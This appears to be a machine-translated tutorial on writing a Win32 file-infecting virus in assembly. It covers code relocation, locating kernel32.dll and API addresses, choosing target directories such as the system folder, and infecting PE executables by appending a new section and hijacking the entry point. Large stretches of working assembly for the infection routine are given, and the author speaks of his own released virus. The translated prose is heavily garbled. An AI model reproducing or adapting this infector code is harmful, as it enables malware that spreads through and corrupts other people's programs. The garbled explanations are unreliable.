How to write a simple virus program author's reprint, please indicate: http://www.czvc.com 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽Level, the virus is already a learning content of water to the stream. But now I have learned that this technology is actually hidden in many mystery, including many technologies, and do not have special learning studies that cannot reach "cattle". Nowadays, this article is now, it is quite practical, you can let you take a lot less detours (sometimes a mistake is enough for a few hours). However, some basic knowledge can only be understood. If you have a day's knowledge, you will be your regret if you don't learn a virus. In addition, since it is written to the association member, there is no more "professional", and it will be more described. Before you see, you should know that this is only a article that can be introduced. If you have already, you will not have to look. It is best to prepare a PE table next to it. Writing virus programs can be written in many languages such as C, compilation, and even some people can use DEPHI to be written. But it is best for writing a virus program or a compilation language. Assembly language, flexible, fast, and small size can play a virus program to the extreme, usually a program is written to only a few thousand bytes contain all functions. Generally, a virus has the following functions: a code relocation second self find the required API address three search file, directory four infection file five destroy system or file (casual you) one, two functions are necessary, five Item features are optional. The function of a virus program infection file is its core and is an important criterion for measuring its quality. (1) The relocation of the code is a variable or function. It is actually a memory address. After compiling, the instruction in the program will access them through the memory address of the variable or function, and this address is an absolute address. If you insert the code to anywhere, you can't find it through the address generated when you compile, because they have already moved. However, when you take this question when you write a program, you can start at the code, put a few lines of code acquisition, after the variable and function as an offset address, explicitly plus this base address to be smooth Found, this is relocation. Just like this code. Call getBaseaddressgetBaseAddress: Pop EbxSub EBX, OFFSET GetBaseAddressmov EAX, DWORD PTR [EBX VAR1] If you use macro assembly language to write viruses, try to use EBX to do the base address pointer, do not use EBP, because EBP will call the band with parameters change. (2) If you get the required API address, a WIN32 program file, the API function address called, is to describe the data structure of the various data locations by the system. The virus is not allowed to be a disabled. Because you did not get into the data structure information of these descriptions of data storage position when you insert the virus's code into the target program. After being inserted into other target procedures, it became a disabled child with only code: (So as a disabled child, you should self-reliance. Search yourself to find the API address you need. The target file contains what we need, we need yourself Looking. The target program file is still a Win32 program. It contains kernel32.dll in its address space. If we find it, we can find any other stuff. The first step is to search for the base address of kernel32.dll. Of course, the entire address space has 4GB, and the user process space for search is also 2GB. Search in 2GB, it is too scary.
Can you make your user a cup of tea when you perform infected target procedures? Or fight the landlord? Here are two techniques to introduce you. After the program is loaded, the loader will call the location of the first instruction of the program's main thread. The instruction it use is called, that is, your program has not been executed yet, there is a return address in the stack area. This return address points to the loader, and the loader is included in kernel32.dll, let's I can find the base location of kernel32.dll to find it. Of course, it is not a one byte of a byte of a person to find, but a page of a page. Because Win32, the start position of the code or data is always aligned in the page unit (4KB under Windows Platform). KERNEL32.DLL is a PE file, we look at the method of comparing the PE file DOS signing flag and PE signature flag. There is also a way to find the SHE technology. This is the best way, the previous method is unstable because the stack is a dynamic reason, generally only puts the code block for the acquisition address in the most, this method is completely unrelated to the stack, where to do it without Error, if your virus needs to use some technical skills such as remote threads, it is best to use this method. SHE structure, the first member points to the next SEH structure, if it is the last one, its value is 0FFFFFFFH. The second member points to an exception handler, and if it is the last she structure and is not specified, the default is the setunhandledEREXCEPTIONFILTER function address. A dialog box will pop up when an exception triggered this function and ask you no error. The blue screen is displayed under 98. This function is included in kernel32.dll, as long as it gets its address, you can find the base location of kernel32.dll. When I say she, I will not forget the TEB. Teb is the thread-related data structure allocated when creating a thread. She is only the first data structure. It also contains many other important things, TEB points to the FS segment selector, is interested in books, this will not say more. Next, look at how to find the SetunHnderExceptionFilter function address. First, according to the value of the "next" SHE structure, the address of the SHE processing function is taken out, that is, the setunhandleredeceptionFilter function address, you can find kernel32.dll to get the kernel32.dll / get kernel32.dll Once the base site is located, it is positioned to its export table, finding the getProcAddress address and use GetProcAddress to find any other functions. When searching for the API, you should pay attention to the name of the API. The actual export name of the API's name is likely not the name when you call, and there are two version of the ANSI version and Unicode version. For example, CreateWindowexa, and the Unicode version of the function name with a W suffix, such as CreateWindowExw. However, considering troubleshooting, the existing compilers don't let you write a suffix, just when compiling, according to your program is an automatic change name of the UNICODE version. The API function after Win2K is a Unicode version. If the ANSI version of the function is called, the system simply converts the string in the function into the unicode string, and then call the Unicode version of the API. Unicode is a development direction, and everyone should develop it habits instead of ANSI. (3) Search for files, the directory is mainly implemented with FindfirstFile, FindNextFile, FindClose. These three functions.
It is worth noting that all files and directories of the directory where the program file is located when searching in the "*. *" Search string. GetCurrentDirectory achieved the current directory of the system. The latter will change with the user's operation, the former will only change as the location of the target program file changes. When searching for directory and files that need to be infected, you should focus on searching the Windows Installation Directory (getSystemDirectory), the current directory (GetCurrentDirectory), of course, the current directory is not let go, for example, you infect QQ, QQ directory There are so many procedures that are often used, such as coral plugs, mailboxes, etc. are all your dishes. My favorite place or the catalog of various processes in the system, those most commonly used, my Suining No.1 virus is to do this by code insertion, very troublesome, and very unstable. Often inexplicably makes the process ends in insertion, although she can avoid it, but still there is not much effect. I am now conceiveing my next virus. At that time, I will use PEB to enumerate the directory where the various processes are, no longer inserting, will make the virus stable, I am in Suining No. 1 The process uses the Toolhelp series function to make the virus in Windows 98. (4) The so-called infection of infection files is to insert the code of the virus program into the target program, and then let the target program execute the code of the virus program. As for where the code is inserted into the target program, how to make the target program execute the inserted virus code, what time is infected with what files are the core of infection. First discuss where the virus code is inserted into where the target program is taken effect. Executable files under the Windows platform are PE format, this format file, you can see it as two parts. The first part is a data structure describing various types of data storage locations, and the second part is various data, such as resources, code, data, and more. Therefore, if you want to correct the code to the target program file, you want to read and modify the data structure that describes the location of the various data storage locations in the target program file. Let's calculate the location of our code insertion, here we tell a simple insertion method, achieved by adding a new section in the file.
push eax push FILE_ATTRIBUTE_NORMALpush eaxcall DWORD ptr [ebx SetFileAttributes1] pop eax push NULLpush FILE_ATTRIBUTE_NORMALpush OPEN_EXISTINGpush NULLpush 0push GENERIC_READ or GENERIC_WRITE push eaxcall DWORD ptr [ebx CreateFile1] inc eaxjz @ error1 dec eaxmov DWORD ptr [ebx hFile], eax above that steps If you don't have to say more, it is open the file! The pointer on the file name inside the push eax NULLpush DWORD ptr [ebx hFile] call DWORD ptr [ebx GetFileSize1] mov DWORD ptr [ebx dwFileSize], eax push NULLpush 0push 0push PAGE_READWRITEpush NULLpush DWORD ptr [ebx hFile] call DWORD ptr [ebx CreateFileMapping1] or eax, eaxjz @ error1mov DWORD ptr [ebx hMap], eaxpush 0push 0push 0push FILE_MAP_READ or FILE_MAP_WRITEpush DWORD ptr [ebx hMap] call DWORD ptr [ebx MapViewOfFile1] or eax, eaxjz @ error1mov DWORD ptr [EBX PMAP], EAXMOV ESI, ESIMP WORD PTR [ESI], 'ZM'JNz @ Error1Add ESI, DWORD PTR [ESI 3CH] CMP Word PTR [ESI],' EP'Jnz @ Error1cmp DWORD PTR [ESI 4CH ], '1.NS'JZ @ Error1 This step is to map the file, and then determine whether the file is not a PE format file, is it already infected? If these two conditions have a satisfaction, it means that there is no need to infect it, jump to @ Error1. MOV EAX, DWORD PTR [EBX DWFILESIZE] Add Eax, Virus_end-Virus_Startmov ECX, DWORD PTR [ESI 3CH] CALL Align1 Just achieved the size of the file, now add it and the virus volume, then paid, pay attention The file is aligned. Align1 is a pair of collaborative procedures, and the alignment value is placed in Eax, and the alignment is placed in ECX. When I said this, I started to watch the tutorial, this article said that the alignment method has a mistake, I didn't know, once I wasted me 3 times for this mistake, I was so confident. This error is to align, the so-called alignment is the multiple of a number (unlined) to another number (alignment factor) he talks about the alignment method, he said, first remove the number of unsciled numbers , Then subtract the remainder with alignment factor, and then add this number of subtracted numbers. I started to check a few values, and most files can also be infected correctly, but there are so few files that have problems.
Later, it was found to be the problem of file alignment, so I changed a more logically easier to think about, and an unsigned number is always a multiple of factors. We first identify that the number of unsigned is a few times that is aligned. Using unsigned number to alignment, if there is any remainder, there is no alignment, it is double, and the merchants will be multiplied by alignment, so that the alignment value is obtained. If the alignment itself is larger than the original number, then there is still the remainder, plus one by alignment factor, is double the factor, so this method is both simple and logic. This is the method. But I am not very blame the Billy Belceb because he is 16 years old when he wrote an electronic tutorial. The 16-year-old article can be written in a deep article. Admire ~~~. mov DWORD ptr [ebx dwFileSize], eaxpush DWORD ptr [ebx pMap] call DWORD ptr [ebx UnmapViewOfFile1] push DWORD ptr [ebx hMap] call DWORD ptr [ebx CloseHandle1] push 0push DWORD ptr [ebx dwFileSize] push 0push PAGE_READWRITEpush 0push DWORD ptr [ebx hFile] call DWORD ptr [ebx CreateFileMapping1] or eax, eaxjz @ error1mov DWORD ptr [ebx hMap], eaxpush 0push 0push 0push FILE_MAP_READ or FILE_MAP_WRITEpush DWORD ptr [ebx hMap] call DWORD ptr [EBX MAPVIEWOFFILE1] OR EAX, EAXJZ @ Error1Mov DWORD PTR [EBX PMAP], EAX Remaps all file views according to the new file size according to the logs. At this time, the size of the file is also increased accordingly.
MOV ESI, ESIDD ESI, DWORD PTR [ESI 3CH] The following two lines of code can ensure that the infection program will not pop up when running in XP, not popping out of the error dialog box that cannot load a certain DLL! ! When I didn't know, I have written a low level of virus that can infect a lot of documents. I thought that the virus infection was like this, but one day, I found that the record after the infection of the virus is unable to use, always prompt "Illegal Win32 Program" I re-written the virus once, change the code, but still no effect. I am very disappointed, watch the article online. Inadvertently saw an article in Lao Luo, some of which he specially wrote a comment. It is grateful to someone who helped him in technology and pointed out that a certain place should be 0. It seems that he has also encountered this problem. I added his code to my program, and the miracle found it, it can be infected. I then checked a lot of information and didn't find this structure. I only know that it is the 11th member of Image_Data_Directory. Push 0POP [ESI Image_NT_HEADERS.OPTIONALHEADER.DATADIRECTIRECTORY (88)] MOV ECX, DWORD PTR [ESI 74H] SHL ECX, 3XOR EDX, EDXLEA EDI, [ECX ESI 78H] Movzx Eax, Word PTR [ESI 6H] Imul EAX, EAX, 28HADD EDI, EAX; positioning to the last section; starting to fill the new section Structure This code is very simple, it is positioned to the end of the final section. You may be able to use SizeOfheader plus NumberOfSecion * to size 28h but I still compare the methods I use now. The reason is that there is a much better compatibility, and my method is to get the number of image_data_directory multiplied the size of its size plus other heads. Plus the number of sessions of the section of the section 28h. There are many viruses to use this method. why? I think Windows will expand the number of IMAGE_DATA_DIRECTORY members in the future. So dynamic achieved it better. Ok, now EDI has pointed to the end of the section. Nowadays, it is a new addition to the site: (I will give it a section of our section. Mov DWORD PTR [EDI], '1ns'mov DWORD PTR [EDI 8] Virus_END-VIRUS_START here's name SN1 (8 bytes of this domain), and gives Virtual size (some places as Physical size) My virus size value, this value does not need to be aligned. Say Align, everyone must know that a concept is that the data section in the memory is aligned, the data files in the file are aligned. MOV ECX, DWORD PTR [ESI 38H] MOV Eax, DWORD PTR [EDI-28H 0CH] Add Eax, DWORD PTR [ EDI-28H 8H] MOV ECX, DWORD PTR [ESI 38H] Invoke Align1MOV DWORD PTR [EDI 0CH], after the EAX gets the section, the memory address when the Virtual Address member is loaded in this section in memory. Assignment. Method is to get the start address of the previous section plus the unsigned size of the previous section, that is, Virtual Size is aligned, it is possible. Mov ECX, DWORD PTR [ESI 3CH] MOV EAX, Virus_end- Virus_startinvoke align1mov DWORD PTR [EDI 10h], EAX now we should give the SizeOfrawData to the value.
This domain is the size in the file, you must go through the file alignment, well, we get the virus size, the file is Mov Eax, DWORD PTR [EDI-28H 10h] Add Eax, DWORD PTR [EDI- 28h 14h] MOV DWORD PTR [EDI 14H], EAX also has a value of the offset in the file called PointertorawData. This value is calculated by the SizeOfrawData in the previous section plus the previous section PointertorawData. why? Your own brain. It is useless to learn if you don't have a brain shell. MOV DWORD PTR [EDI 24H], 0E00000E0H This domain is the best understanding, the member name is called characteristics meaning in Chinese. There are several, readable, executable, can be shared, and more important, several attributes are all the few, which can be shared is more embarrassed. Speaking, can share properties can make this section. Data or code refuses to write on write, what is write time, such as 10 instances of notepads are running, Windows assigns 10 different size processes to the same program, Microsoft can be Stupid, he uses a technology called writing when it can save memory. 10 Notepads run at the same time, the process space of 10 notepads is mapped to one identical physical memory. When there is a notepad who wants to write, the data will change all, it will affect the other 9 Notepad, but with the interference of copying techniques when writing, the notepad written to the data is added to the block memory, and the newly assigned physical memory is lost to the process space address written by Notepad, and will The original data is copied to this new memory so that it is written in the new memory when it is written, and I am pleased that I don't affect other processes. If you haven't understood it, look at the "Windows Core Programming" memory management that section. Go back to our infection problem, if your section has a shared property, it means that it refuses to write to copy technology, that is, the notepad of the writing data will affect the other 9 credits, if this is a If the variable is, 10 notepads can affect global or shared variables. MOV EAX, DWORD PTR [EDI 0CH] add eax, start-virus_start The upper two lines of code is useful to calculate the virus's code entry point, and the calculation method is simple, it is the label Start to start the place to subtract the virus to start Local ID VIRUS_START, you may not understand, this is because the virus begins where my virus began to execute code. My virus began to execute the code in front of the code, and the data is also included in the code segment. . That is to say, my virus is only one festival .Text. (Code Festival called .text) -push dword ptr [ESI 28h] Pop DWORD PTR [EBX OLDIP] Save the original code entry point, this is an offset, if you really want to jump back to the original code entry point You can't only perform AddressofEntryPointer (the pointer to the code entry point), but also add an imagebase member to jump, otherwise it is equal to suicide your virus. Why? Because addressofentryPointer is an offset, the number is small, and one hop is likely to jump to the 2GB of the system process space, you see Microsoft, you don't. Unless you use she.
PUSH EAXPOP DWORD PTR [ESI 28H] Now the first step of the previously calculated virus's code entry point address plus the value of the offset address Virtual Address member of this section, fill in. Why do you want to add two offsets? Because your brain does not turn around: (; calculate new SizeOfImagemov Eax, virus_end-virus_startadd Eax, DWORD PTR [ESI 50H] MOV ECX, DWORD PTR [ESI 38H] Invoke Align1Mov DWORD PTR [ESI 50H], EAX this Sizeofimage Members are not very hit! Windows2000 this value is slightly worshiped. Many people have lost their losses in this place, ft. This value means the entire can map after the size of the memory after mapping. Plus your new size plus the original SizeOfimage is aligned. If you are infected, the file can't run, first look at this problem. INC WORD PTR [ESI 6h] has just added a section, Now add the value of NumberOfSecion, a PUSH DWORD PTR [ESI 34H] POP DWORD PTR [EBX OLDBase] acquires the memory base address of the program file runtime. Our virus uses relocation, not with it, but we want to jump Back to the original program file, the code entry point continues to execute, just use it, it is very clear that it is very clear. MOV EAX, DWORD PTR [EDI 10h]; obtain file offset Add Eax, DWORD PTR [EDI 14h]; Plus the file size, huh, huh, the file offset is small, and the last section, smart, you may have already thought that this is the end of the file, this stuff is left behind. And DWORD PTR [ebx isinject] 0; this value, this is a logo variable that I am inserted into other processes .Push Eaxmov DWORD PTR [ESI 4CH], '1.ns'mov ECX, Virus_end-Virus_Startmov EDI, DWORD PTR [EDI 14h] Add EDI, DWORD PTR [EBX PMAP] Lea ESI, [EBX VIRUS_START] Rep MOVSB The above code main function is to write the virus code in the position of the PointertorawData, which we have added, PTR [EBX PMAP ] Call DWORD PTR [EBX UnmapViewOffile1] Push DWORD PTR [EBX HMAP] Call DWORD PTR [EBX CloseHandle1] Turns off the memory map file, do not understand Win32API go. POP EAX PUSH FILE_BEGINPUSH 0PUSH EAXPUSH DWORD PTR [EBX HFILE] CALL DWORD PTR [EBX SETFILEPOINTER1] Move the file pointer from the beginning of the file to the end of the new file. PUSH DWORD PTR [EBX HFILE] CALL DWORD PTR [EBX STENDOFFILE1] Setting the file pointer to the end position, (actually in the adjustment file size) Why do you want to do this? Because I started the file size to change the file size into the size of the original file size unlined virus size.
